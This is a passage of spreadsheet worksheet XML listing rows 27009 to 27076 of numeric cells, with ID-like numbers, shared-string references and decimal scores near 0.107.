      <c r="C27009" s="2" t="s">
        <v>25958</v>
      </c>
      <c r="D27009" s="2">
        <v>1.0</v>
      </c>
      <c r="E27009" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27009" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="27010" ht="15.75" customHeight="1">
      <c r="A27010" s="1">
        <v>16038.0</v>
      </c>
      <c r="B27010" s="2">
        <v>4.5125053E7</v>
      </c>
      <c r="C27010" s="2" t="s">
        <v>25959</v>
      </c>
      <c r="D27010" s="2">
        <v>1.0</v>
      </c>
      <c r="E27010" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27010" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="27011" ht="15.75" customHeight="1">
      <c r="A27011" s="1">
        <v>17230.0</v>
      </c>
      <c r="B27011" s="2">
        <v>4.9066306E7</v>
      </c>
      <c r="C27011" s="2" t="s">
        <v>25960</v>
      </c>
      <c r="D27011" s="2">
        <v>1.0</v>
      </c>
      <c r="E27011" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27011" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="27012" ht="15.75" customHeight="1">
      <c r="A27012" s="1">
        <v>17870.0</v>
      </c>
      <c r="B27012" s="2">
        <v>5.1023233E7</v>
      </c>
      <c r="C27012" s="2" t="s">
        <v>25961</v>
      </c>
      <c r="D27012" s="2">
        <v>1.0</v>
      </c>
      <c r="E27012" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27012" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="27013" ht="15.75" customHeight="1">
      <c r="A27013" s="1">
        <v>19446.0</v>
      </c>
      <c r="B27013" s="2">
        <v>5.5729674E7</v>
      </c>
      <c r="C27013" s="2" t="s">
        <v>25962</v>
      </c>
      <c r="D27013" s="2">
        <v>1.0</v>
      </c>
      <c r="E27013" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27013" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="27014" ht="15.75" customHeight="1">
      <c r="A27014" s="1">
        <v>21686.0</v>
      </c>
      <c r="B27014" s="2">
        <v>2.5138327E7</v>
      </c>
      <c r="C27014" s="2" t="s">
        <v>25842</v>
      </c>
      <c r="D27014" s="2">
        <v>1.0</v>
      </c>
      <c r="E27014" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27014" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="27015" ht="15.75" customHeight="1">
      <c r="A27015" s="1">
        <v>22898.0</v>
      </c>
      <c r="B27015" s="2">
        <v>4.7964634E7</v>
      </c>
      <c r="C27015" s="2" t="s">
        <v>25963</v>
      </c>
      <c r="D27015" s="2">
        <v>1.0</v>
      </c>
      <c r="E27015" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27015" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="27016" ht="15.75" customHeight="1">
      <c r="A27016" s="1">
        <v>23152.0</v>
      </c>
      <c r="B27016" s="2">
        <v>5.1817927E7</v>
      </c>
      <c r="C27016" s="2" t="s">
        <v>25964</v>
      </c>
      <c r="D27016" s="2">
        <v>1.0</v>
      </c>
      <c r="E27016" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27016" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="27017" ht="15.75" customHeight="1">
      <c r="A27017" s="1">
        <v>27086.0</v>
      </c>
      <c r="B27017" s="2">
        <v>2.0484895E7</v>
      </c>
      <c r="C27017" s="2" t="s">
        <v>25965</v>
      </c>
      <c r="D27017" s="2">
        <v>1.0</v>
      </c>
      <c r="E27017" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27017" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="27018" ht="15.75" customHeight="1">
      <c r="A27018" s="1">
        <v>30967.0</v>
      </c>
      <c r="B27018" s="2">
        <v>4.7481604E7</v>
      </c>
      <c r="C27018" s="2" t="s">
        <v>25826</v>
      </c>
      <c r="D27018" s="2">
        <v>1.0</v>
      </c>
      <c r="E27018" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27018" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="27019" ht="15.75" customHeight="1">
      <c r="A27019" s="1">
        <v>3737.0</v>
      </c>
      <c r="B27019" s="2">
        <v>3.9661118E7</v>
      </c>
      <c r="C27019" s="2" t="s">
        <v>25966</v>
      </c>
      <c r="D27019" s="2">
        <v>1.0</v>
      </c>
      <c r="E27019" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27019" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="27020" ht="15.75" customHeight="1">
      <c r="A27020" s="1">
        <v>5342.0</v>
      </c>
      <c r="B27020" s="2">
        <v>4.5330182E7</v>
      </c>
      <c r="C27020" s="2" t="s">
        <v>25967</v>
      </c>
      <c r="D27020" s="2">
        <v>1.0</v>
      </c>
      <c r="E27020" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27020" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="27021" ht="15.75" customHeight="1">
      <c r="A27021" s="1">
        <v>6069.0</v>
      </c>
      <c r="B27021" s="2">
        <v>4.7624955E7</v>
      </c>
      <c r="C27021" s="2" t="s">
        <v>25968</v>
      </c>
      <c r="D27021" s="2">
        <v>1.0</v>
      </c>
      <c r="E27021" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27021" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="27022" ht="15.75" customHeight="1">
      <c r="A27022" s="1">
        <v>6892.0</v>
      </c>
      <c r="B27022" s="2">
        <v>4.978501E7</v>
      </c>
      <c r="C27022" s="2" t="s">
        <v>25969</v>
      </c>
      <c r="D27022" s="2">
        <v>1.0</v>
      </c>
      <c r="E27022" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27022" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="27023" ht="15.75" customHeight="1">
      <c r="A27023" s="1">
        <v>7167.0</v>
      </c>
      <c r="B27023" s="2">
        <v>5.0501921E7</v>
      </c>
      <c r="C27023" s="2" t="s">
        <v>25970</v>
      </c>
      <c r="D27023" s="2">
        <v>1.0</v>
      </c>
      <c r="E27023" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27023" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="27024" ht="15.75" customHeight="1">
      <c r="A27024" s="1">
        <v>8778.0</v>
      </c>
      <c r="B27024" s="2">
        <v>5.458593E7</v>
      </c>
      <c r="C27024" s="2" t="s">
        <v>25971</v>
      </c>
      <c r="D27024" s="2">
        <v>1.0</v>
      </c>
      <c r="E27024" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27024" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="27025" ht="15.75" customHeight="1">
      <c r="A27025" s="1">
        <v>13600.0</v>
      </c>
      <c r="B27025" s="2">
        <v>3.5784814E7</v>
      </c>
      <c r="C27025" s="2" t="s">
        <v>25972</v>
      </c>
      <c r="D27025" s="2">
        <v>1.0</v>
      </c>
      <c r="E27025" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27025" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="27026" ht="15.75" customHeight="1">
      <c r="A27026" s="1">
        <v>15188.0</v>
      </c>
      <c r="B27026" s="2">
        <v>4.2034598E7</v>
      </c>
      <c r="C27026" s="2" t="s">
        <v>25973</v>
      </c>
      <c r="D27026" s="2">
        <v>1.0</v>
      </c>
      <c r="E27026" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27026" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="27027" ht="15.75" customHeight="1">
      <c r="A27027" s="1">
        <v>17318.0</v>
      </c>
      <c r="B27027" s="2">
        <v>4.9335802E7</v>
      </c>
      <c r="C27027" s="2" t="s">
        <v>25974</v>
      </c>
      <c r="D27027" s="2">
        <v>1.0</v>
      </c>
      <c r="E27027" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27027" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="27028" ht="15.75" customHeight="1">
      <c r="A27028" s="1">
        <v>18246.0</v>
      </c>
      <c r="B27028" s="2">
        <v>5.2144673E7</v>
      </c>
      <c r="C27028" s="2" t="s">
        <v>25975</v>
      </c>
      <c r="D27028" s="2">
        <v>1.0</v>
      </c>
      <c r="E27028" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27028" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="27029" ht="15.75" customHeight="1">
      <c r="A27029" s="1">
        <v>19982.0</v>
      </c>
      <c r="B27029" s="2">
        <v>5.7612546E7</v>
      </c>
      <c r="C27029" s="2" t="s">
        <v>25976</v>
      </c>
      <c r="D27029" s="2">
        <v>1.0</v>
      </c>
      <c r="E27029" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27029" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="27030" ht="15.75" customHeight="1">
      <c r="A27030" s="1">
        <v>26188.0</v>
      </c>
      <c r="B27030" s="2">
        <v>1.6160882E7</v>
      </c>
      <c r="C27030" s="2" t="s">
        <v>25977</v>
      </c>
      <c r="D27030" s="2">
        <v>1.0</v>
      </c>
      <c r="E27030" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27030" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="27031" ht="15.75" customHeight="1">
      <c r="A27031" s="1">
        <v>26687.0</v>
      </c>
      <c r="B27031" s="2">
        <v>1.8124607E7</v>
      </c>
      <c r="C27031" s="2" t="s">
        <v>25978</v>
      </c>
      <c r="D27031" s="2">
        <v>1.0</v>
      </c>
      <c r="E27031" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27031" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="27032" ht="15.75" customHeight="1">
      <c r="A27032" s="1">
        <v>29867.0</v>
      </c>
      <c r="B27032" s="2">
        <v>3.591648E7</v>
      </c>
      <c r="C27032" s="2" t="s">
        <v>25979</v>
      </c>
      <c r="D27032" s="2">
        <v>1.0</v>
      </c>
      <c r="E27032" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27032" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="27033" ht="15.75" customHeight="1">
      <c r="A27033" s="1">
        <v>32952.0</v>
      </c>
      <c r="B27033" s="2">
        <v>6489156.0</v>
      </c>
      <c r="C27033" s="2" t="s">
        <v>25877</v>
      </c>
      <c r="D27033" s="2">
        <v>1.0</v>
      </c>
      <c r="E27033" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27033" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="27034" ht="15.75" customHeight="1">
      <c r="A27034" s="1">
        <v>126.0</v>
      </c>
      <c r="B27034" s="2">
        <v>1.316862E7</v>
      </c>
      <c r="C27034" s="2" t="s">
        <v>25980</v>
      </c>
      <c r="D27034" s="2">
        <v>1.0</v>
      </c>
      <c r="E27034" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27034" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="27035" ht="15.75" customHeight="1">
      <c r="A27035" s="1">
        <v>1997.0</v>
      </c>
      <c r="B27035" s="2">
        <v>3.0571558E7</v>
      </c>
      <c r="C27035" s="2" t="s">
        <v>25981</v>
      </c>
      <c r="D27035" s="2">
        <v>1.0</v>
      </c>
      <c r="E27035" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27035" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="27036" ht="15.75" customHeight="1">
      <c r="A27036" s="1">
        <v>5612.0</v>
      </c>
      <c r="B27036" s="2">
        <v>4.6164142E7</v>
      </c>
      <c r="C27036" s="2" t="s">
        <v>25982</v>
      </c>
      <c r="D27036" s="2">
        <v>1.0</v>
      </c>
      <c r="E27036" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27036" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="27037" ht="15.75" customHeight="1">
      <c r="A27037" s="1">
        <v>7134.0</v>
      </c>
      <c r="B27037" s="2">
        <v>5.0439744E7</v>
      </c>
      <c r="C27037" s="2" t="s">
        <v>25983</v>
      </c>
      <c r="D27037" s="2">
        <v>1.0</v>
      </c>
      <c r="E27037" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27037" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="27038" ht="15.75" customHeight="1">
      <c r="A27038" s="1">
        <v>21125.0</v>
      </c>
      <c r="B27038" s="2">
        <v>1.8353604E7</v>
      </c>
      <c r="C27038" s="2" t="s">
        <v>25984</v>
      </c>
      <c r="D27038" s="2">
        <v>1.0</v>
      </c>
      <c r="E27038" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27038" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="27039" ht="15.75" customHeight="1">
      <c r="A27039" s="1">
        <v>23873.0</v>
      </c>
      <c r="B27039" s="2">
        <v>8350160.0</v>
      </c>
      <c r="C27039" s="2" t="s">
        <v>25985</v>
      </c>
      <c r="D27039" s="2">
        <v>1.0</v>
      </c>
      <c r="E27039" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27039" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="27040" ht="15.75" customHeight="1">
      <c r="A27040" s="1">
        <v>25386.0</v>
      </c>
      <c r="B27040" s="2">
        <v>1.3668444E7</v>
      </c>
      <c r="C27040" s="2" t="s">
        <v>25986</v>
      </c>
      <c r="D27040" s="2">
        <v>1.0</v>
      </c>
      <c r="E27040" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27040" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="27041" ht="15.75" customHeight="1">
      <c r="A27041" s="1">
        <v>26280.0</v>
      </c>
      <c r="B27041" s="2">
        <v>1.6424607E7</v>
      </c>
      <c r="C27041" s="2" t="s">
        <v>25987</v>
      </c>
      <c r="D27041" s="2">
        <v>1.0</v>
      </c>
      <c r="E27041" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27041" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="27042" ht="15.75" customHeight="1">
      <c r="A27042" s="1">
        <v>29727.0</v>
      </c>
      <c r="B27042" s="2">
        <v>3.456165E7</v>
      </c>
      <c r="C27042" s="2" t="s">
        <v>25988</v>
      </c>
      <c r="D27042" s="2">
        <v>1.0</v>
      </c>
      <c r="E27042" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27042" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="27043" ht="15.75" customHeight="1">
      <c r="A27043" s="1">
        <v>31108.0</v>
      </c>
      <c r="B27043" s="2">
        <v>4.8670685E7</v>
      </c>
      <c r="C27043" s="2" t="s">
        <v>25989</v>
      </c>
      <c r="D27043" s="2">
        <v>1.0</v>
      </c>
      <c r="E27043" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27043" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="27044" ht="15.75" customHeight="1">
      <c r="A27044" s="1">
        <v>5783.0</v>
      </c>
      <c r="B27044" s="2">
        <v>4.6736158E7</v>
      </c>
      <c r="C27044" s="2" t="s">
        <v>25990</v>
      </c>
      <c r="D27044" s="2">
        <v>1.0</v>
      </c>
      <c r="E27044" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27044" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="27045" ht="15.75" customHeight="1">
      <c r="A27045" s="1">
        <v>10841.0</v>
      </c>
      <c r="B27045" s="2">
        <v>1.6053853E7</v>
      </c>
      <c r="C27045" s="2" t="s">
        <v>25991</v>
      </c>
      <c r="D27045" s="2">
        <v>1.0</v>
      </c>
      <c r="E27045" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27045" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="27046" ht="15.75" customHeight="1">
      <c r="A27046" s="1">
        <v>15949.0</v>
      </c>
      <c r="B27046" s="2">
        <v>4.4750077E7</v>
      </c>
      <c r="C27046" s="2" t="s">
        <v>25992</v>
      </c>
      <c r="D27046" s="2">
        <v>1.0</v>
      </c>
      <c r="E27046" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27046" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="27047" ht="15.75" customHeight="1">
      <c r="A27047" s="1">
        <v>16651.0</v>
      </c>
      <c r="B27047" s="2">
        <v>4719527.0</v>
      </c>
      <c r="C27047" s="2" t="s">
        <v>25993</v>
      </c>
      <c r="D27047" s="2">
        <v>1.0</v>
      </c>
      <c r="E27047" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27047" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="27048" ht="15.75" customHeight="1">
      <c r="A27048" s="1">
        <v>18182.0</v>
      </c>
      <c r="B27048" s="2">
        <v>5.1992667E7</v>
      </c>
      <c r="C27048" s="2" t="s">
        <v>25994</v>
      </c>
      <c r="D27048" s="2">
        <v>1.0</v>
      </c>
      <c r="E27048" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27048" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="27049" ht="15.75" customHeight="1">
      <c r="A27049" s="1">
        <v>22986.0</v>
      </c>
      <c r="B27049" s="2">
        <v>4.9385005E7</v>
      </c>
      <c r="C27049" s="2" t="s">
        <v>25995</v>
      </c>
      <c r="D27049" s="2">
        <v>1.0</v>
      </c>
      <c r="E27049" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27049" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="27050" ht="15.75" customHeight="1">
      <c r="A27050" s="1">
        <v>29114.0</v>
      </c>
      <c r="B27050" s="2">
        <v>3.0434068E7</v>
      </c>
      <c r="C27050" s="2" t="s">
        <v>25996</v>
      </c>
      <c r="D27050" s="2">
        <v>1.0</v>
      </c>
      <c r="E27050" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27050" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="27051" ht="15.75" customHeight="1">
      <c r="A27051" s="1">
        <v>34197.0</v>
      </c>
      <c r="B27051" s="2">
        <v>9986030.0</v>
      </c>
      <c r="C27051" s="2" t="s">
        <v>25997</v>
      </c>
      <c r="D27051" s="2">
        <v>1.0</v>
      </c>
      <c r="E27051" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27051" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="27052" ht="15.75" customHeight="1">
      <c r="A27052" s="1">
        <v>11324.0</v>
      </c>
      <c r="B27052" s="2">
        <v>2.1080342E7</v>
      </c>
      <c r="C27052" s="2" t="s">
        <v>25998</v>
      </c>
      <c r="D27052" s="2">
        <v>1.0</v>
      </c>
      <c r="E27052" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27052" s="2">
        <v>0.1079059829059829</v>
      </c>
    </row>
    <row r="27053" ht="15.75" customHeight="1">
      <c r="A27053" s="1">
        <v>29397.0</v>
      </c>
      <c r="B27053" s="2">
        <v>3.1949761E7</v>
      </c>
      <c r="C27053" s="2" t="s">
        <v>25999</v>
      </c>
      <c r="D27053" s="2">
        <v>1.0</v>
      </c>
      <c r="E27053" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27053" s="2">
        <v>0.1079059829059829</v>
      </c>
    </row>
    <row r="27054" ht="15.75" customHeight="1">
      <c r="A27054" s="1">
        <v>28618.0</v>
      </c>
      <c r="B27054" s="2">
        <v>2.7165628E7</v>
      </c>
      <c r="C27054" s="2" t="s">
        <v>26000</v>
      </c>
      <c r="D27054" s="2">
        <v>1.0</v>
      </c>
      <c r="E27054" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27054" s="2">
        <v>0.1067708333333333</v>
      </c>
    </row>
    <row r="27055" ht="15.75" customHeight="1">
      <c r="A27055" s="1">
        <v>25537.0</v>
      </c>
      <c r="B27055" s="2">
        <v>1.4252726E7</v>
      </c>
      <c r="C27055" s="2" t="s">
        <v>26001</v>
      </c>
      <c r="D27055" s="2">
        <v>1.0</v>
      </c>
      <c r="E27055" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27055" s="2">
        <v>0.1066308243727598</v>
      </c>
    </row>
    <row r="27056" ht="15.75" customHeight="1">
      <c r="A27056" s="1">
        <v>14696.0</v>
      </c>
      <c r="B27056" s="2">
        <v>4.0558152E7</v>
      </c>
      <c r="C27056" s="2" t="s">
        <v>26002</v>
      </c>
      <c r="D27056" s="2">
        <v>1.0</v>
      </c>
      <c r="E27056" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27056" s="2">
        <v>0.1065573770491803</v>
      </c>
    </row>
    <row r="27057" ht="15.75" customHeight="1">
      <c r="A27057" s="1">
        <v>29901.0</v>
      </c>
      <c r="B27057" s="2">
        <v>3607043.0</v>
      </c>
      <c r="C27057" s="2" t="s">
        <v>26003</v>
      </c>
      <c r="D27057" s="2">
        <v>1.0</v>
      </c>
      <c r="E27057" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27057" s="2">
        <v>0.1065573770491803</v>
      </c>
    </row>
    <row r="27058" ht="15.75" customHeight="1">
      <c r="A27058" s="1">
        <v>14598.0</v>
      </c>
      <c r="B27058" s="2">
        <v>4.0237307E7</v>
      </c>
      <c r="C27058" s="2" t="s">
        <v>26004</v>
      </c>
      <c r="D27058" s="2">
        <v>1.0</v>
      </c>
      <c r="E27058" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27058" s="2">
        <v>0.1064814814814815</v>
      </c>
    </row>
    <row r="27059" ht="15.75" customHeight="1">
      <c r="A27059" s="1">
        <v>27201.0</v>
      </c>
      <c r="B27059" s="2">
        <v>2.0935943E7</v>
      </c>
      <c r="C27059" s="2" t="s">
        <v>26005</v>
      </c>
      <c r="D27059" s="2">
        <v>1.0</v>
      </c>
      <c r="E27059" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27059" s="2">
        <v>0.1064814814814815</v>
      </c>
    </row>
    <row r="27060" ht="15.75" customHeight="1">
      <c r="A27060" s="1">
        <v>13930.0</v>
      </c>
      <c r="B27060" s="2">
        <v>3.7105453E7</v>
      </c>
      <c r="C27060" s="2" t="s">
        <v>26006</v>
      </c>
      <c r="D27060" s="2">
        <v>1.0</v>
      </c>
      <c r="E27060" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27060" s="2">
        <v>0.1064030131826742</v>
      </c>
    </row>
    <row r="27061" ht="15.75" customHeight="1">
      <c r="A27061" s="1">
        <v>17899.0</v>
      </c>
      <c r="B27061" s="2">
        <v>5.1102726E7</v>
      </c>
      <c r="C27061" s="2" t="s">
        <v>26007</v>
      </c>
      <c r="D27061" s="2">
        <v>1.0</v>
      </c>
      <c r="E27061" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27061" s="2">
        <v>0.1064030131826742</v>
      </c>
    </row>
    <row r="27062" ht="15.75" customHeight="1">
      <c r="A27062" s="1">
        <v>22951.0</v>
      </c>
      <c r="B27062" s="2">
        <v>4.8932568E7</v>
      </c>
      <c r="C27062" s="2" t="s">
        <v>26008</v>
      </c>
      <c r="D27062" s="2">
        <v>1.0</v>
      </c>
      <c r="E27062" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27062" s="2">
        <v>0.1064030131826742</v>
      </c>
    </row>
    <row r="27063" ht="15.75" customHeight="1">
      <c r="A27063" s="1">
        <v>25749.0</v>
      </c>
      <c r="B27063" s="2">
        <v>1.4600289E7</v>
      </c>
      <c r="C27063" s="2" t="s">
        <v>26009</v>
      </c>
      <c r="D27063" s="2">
        <v>1.0</v>
      </c>
      <c r="E27063" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27063" s="2">
        <v>0.1064030131826742</v>
      </c>
    </row>
    <row r="27064" ht="15.75" customHeight="1">
      <c r="A27064" s="1">
        <v>27907.0</v>
      </c>
      <c r="B27064" s="2">
        <v>2.3709251E7</v>
      </c>
      <c r="C27064" s="2" t="s">
        <v>25908</v>
      </c>
      <c r="D27064" s="2">
        <v>1.0</v>
      </c>
      <c r="E27064" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27064" s="2">
        <v>0.1064030131826742</v>
      </c>
    </row>
    <row r="27065" ht="15.75" customHeight="1">
      <c r="A27065" s="1">
        <v>31535.0</v>
      </c>
      <c r="B27065" s="2">
        <v>5.0945409E7</v>
      </c>
      <c r="C27065" s="2" t="s">
        <v>26010</v>
      </c>
      <c r="D27065" s="2">
        <v>1.0</v>
      </c>
      <c r="E27065" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27065" s="2">
        <v>0.1064030131826742</v>
      </c>
    </row>
    <row r="27066" ht="15.75" customHeight="1">
      <c r="A27066" s="1">
        <v>1342.0</v>
      </c>
      <c r="B27066" s="2">
        <v>2.5864806E7</v>
      </c>
      <c r="C27066" s="2" t="s">
        <v>26011</v>
      </c>
      <c r="D27066" s="2">
        <v>1.0</v>
      </c>
      <c r="E27066" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27066" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="27067" ht="15.75" customHeight="1">
      <c r="A27067" s="1">
        <v>1786.0</v>
      </c>
      <c r="B27067" s="2">
        <v>2.909613E7</v>
      </c>
      <c r="C27067" s="2" t="s">
        <v>26012</v>
      </c>
      <c r="D27067" s="2">
        <v>1.0</v>
      </c>
      <c r="E27067" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27067" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="27068" ht="15.75" customHeight="1">
      <c r="A27068" s="1">
        <v>9605.0</v>
      </c>
      <c r="B27068" s="2">
        <v>5.6158153E7</v>
      </c>
      <c r="C27068" s="2" t="s">
        <v>26013</v>
      </c>
      <c r="D27068" s="2">
        <v>1.0</v>
      </c>
      <c r="E27068" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27068" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="27069" ht="15.75" customHeight="1">
      <c r="A27069" s="1">
        <v>10776.0</v>
      </c>
      <c r="B27069" s="2">
        <v>1.5637555E7</v>
      </c>
      <c r="C27069" s="2" t="s">
        <v>26014</v>
      </c>
      <c r="D27069" s="2">
        <v>1.0</v>
      </c>
      <c r="E27069" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27069" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="27070" ht="15.75" customHeight="1">
      <c r="A27070" s="1">
        <v>12630.0</v>
      </c>
      <c r="B27070" s="2">
        <v>3.0253961E7</v>
      </c>
      <c r="C27070" s="2" t="s">
        <v>26015</v>
      </c>
      <c r="D27070" s="2">
        <v>1.0</v>
      </c>
      <c r="E27070" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27070" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="27071" ht="15.75" customHeight="1">
      <c r="A27071" s="1">
        <v>13703.0</v>
      </c>
      <c r="B27071" s="2">
        <v>3.6179247E7</v>
      </c>
      <c r="C27071" s="2" t="s">
        <v>26016</v>
      </c>
      <c r="D27071" s="2">
        <v>1.0</v>
      </c>
      <c r="E27071" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27071" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="27072" ht="15.75" customHeight="1">
      <c r="A27072" s="1">
        <v>14203.0</v>
      </c>
      <c r="B27072" s="2">
        <v>3.8236032E7</v>
      </c>
      <c r="C27072" s="2" t="s">
        <v>26017</v>
      </c>
      <c r="D27072" s="2">
        <v>1.0</v>
      </c>
      <c r="E27072" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27072" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="27073" ht="15.75" customHeight="1">
      <c r="A27073" s="1">
        <v>14660.0</v>
      </c>
      <c r="B27073" s="2">
        <v>4.0425039E7</v>
      </c>
      <c r="C27073" s="2" t="s">
        <v>26018</v>
      </c>
      <c r="D27073" s="2">
        <v>1.0</v>
      </c>
      <c r="E27073" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27073" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="27074" ht="15.75" customHeight="1">
      <c r="A27074" s="1">
        <v>15306.0</v>
      </c>
      <c r="B27074" s="2">
        <v>4.2482389E7</v>
      </c>
      <c r="C27074" s="2" t="s">
        <v>26019</v>
      </c>
      <c r="D27074" s="2">
        <v>1.0</v>
      </c>
      <c r="E27074" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27074" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="27075" ht="15.75" customHeight="1">
      <c r="A27075" s="1">
        <v>16388.0</v>
      </c>
      <c r="B27075" s="2">
        <v>4.6235242E7</v>
      </c>
      <c r="C27075" s="2" t="s">
        <v>26020</v>
      </c>
      <c r="D27075" s="2">
        <v>1.0</v>
      </c>
      <c r="E27075" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27075" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="27076" ht="15.75" customHeight="1">
      <c r="A27076" s="1">
        <v>17389.0</v>
      </c>
      <c r="B27076" s="2">
        <v>4.9603857E7</v>
      </c>
